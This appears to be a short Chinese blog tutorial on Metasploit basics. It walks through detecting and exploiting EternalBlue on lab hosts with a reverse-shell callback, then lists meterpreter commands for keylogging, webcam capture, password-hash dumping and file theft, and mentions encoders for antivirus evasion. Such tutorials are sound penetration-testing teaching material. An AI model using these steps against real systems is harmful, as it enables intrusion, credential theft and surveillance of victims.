Msf基本使用步骤
概述
MSF = Metasploit Framework,是全球最知名、开源免费、功能最全的一体化渗透测试框架,由 Rapid7 公司维护,默认预装在 Kali、Parrot 等安全系统中。
启动
msfconsole

在/usr/share/metasploit-framework/modules下有七大核心模块

auxiliary 辅助模块
渗透前期信息搜集、探测、爆破,无入侵提权能力,不会直接拿 shell。
exploits 漏洞利用模块(MSF 核心)
存放所有公开漏洞利用 EXP,利用系统 / 软件漏洞执行代码,拿到目标主机权限。
payloads 载荷模块
入侵成功后,在受害主机上运行的后门代码,决定入侵后能实现什么操作。
encoders 编码器
对 payload 进行编码、变形,修改特征码,尝试绕过杀毒软件查杀。
nops 空指令模块
NOP = 空操作指令(x86 下0x90),填充无意义指令。
post 后渗透模块
拿到主机权限之后使用,巩固权限、内网渗透、信息搜集。
常见使用方法
使用search 搜索漏洞相关利用模块,这里以永恒之蓝为例

使用辅助模块探测漏洞
use auxiliary/scanner/smb/smb_ms17_010
或
use 24

show options显示要填写的参数

需要填写目标主机RHOSTS
set rhosts 192.168.10.134

run运行,探测到可能存在永恒之蓝漏洞

使用exploit模块对永恒之蓝进行利用
得先设置反弹shell的ip和端口
set lhost 192.168.19.128
set lport 4444

还要设置靶机的ip
set rhosts 192.168.10.134

RUN

出现meterpreter >就表示拿到目标机的最高权限,下面列出常见命令
| 命令 | 作用 |
|---|---|
help |
查看全部可用指令 |
sysinfo |
查看目标电脑系统、CPU 信息 |
getuid |
查看当前权限 |
screenshot |
截取目标电脑当前屏幕 |
keyscan_start |
开启键盘记录,keyscan_dump 查看按键记录 |
camshot |
调用摄像头拍照 |
upload 本地文件 目标路径 |
上传文件到被控电脑 |
download 目标文件 本地路径 |
下载电脑文件到 Kali |
hashdump |
抓取 Windows 账号密码哈希 |
shell |
调出目标电脑 cmd 命令行 |
background |
把会话挂后台,回到 msf 控制台 |
![]() |
background可以把会话挂到后台,回到msf控制台进行其他操作,如果想回到会话,使用session id指定会话

小结
本篇文章会持续更新(应该会吧),目前只介绍了最常见的使用方法。如果对其他功能感兴趣可以参考官方文档Setting Module Options | Metasploit Documentation Penetration Testing Software, Pen Testing Security


浙公网安备 33010602011771号